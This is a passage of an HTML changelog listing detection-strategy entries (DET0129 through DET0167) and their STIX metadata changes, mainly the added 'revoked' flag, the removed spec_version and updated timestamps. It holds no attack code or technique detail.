black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0129] Domain Account Enumeration Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0196] Domain Fronting Behavior via Mismatched TLS SNI and HTTP Host Headers</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0176] Drive-by Compromise — Behavior-based, Multi-platform Detection Strategy (T1189)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.686000+00:00</td></tr></tbody></table></details><hr><h4>[DET0476] Email Collection via Local Email Access and Auto-Forwarding Behavior</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0576] Email Forwarding Rule Abuse Detection Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0087] Encrypted or Encoded File Payload Detection Strategy</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0356] Endpoint DoS via OS Exhaustion Flood Detection Strategy</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.691000+00:00</td></tr></tbody></table></details><hr><h4>[DET0208] Endpoint Resource Saturation and Crash Pattern Detection Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0229] Enumeration of Global Address Lists via Email Account Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0587] Enumeration of User or Account Information Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0474] Environmental Keying Discovery-to-Decryption Behavioral Chain Detection Strategy</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.687000+00:00</td></tr></tbody></table></details><hr><h4>[DET0080] Exploit Public-Facing Application – multi-signal correlation (request → error → post-exploit process/egress)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0287] Exploitation for Client Execution – cross-platform behavior chain (browser/Office/3rd-party apps)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.671000+00:00</td></tr></tbody></table></details><hr><h4>[DET0118] Exploitation of Remote Services – multi-platform lateral movement detection</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0325] External Proxy Behavior via Outbound Relay to Intermediate Infrastructure</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.691000+00:00</td></tr></tbody></table></details><hr><h4>[DET0167] Firmware Modification via Flash Tool or Corrupted Firmware Upload</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: 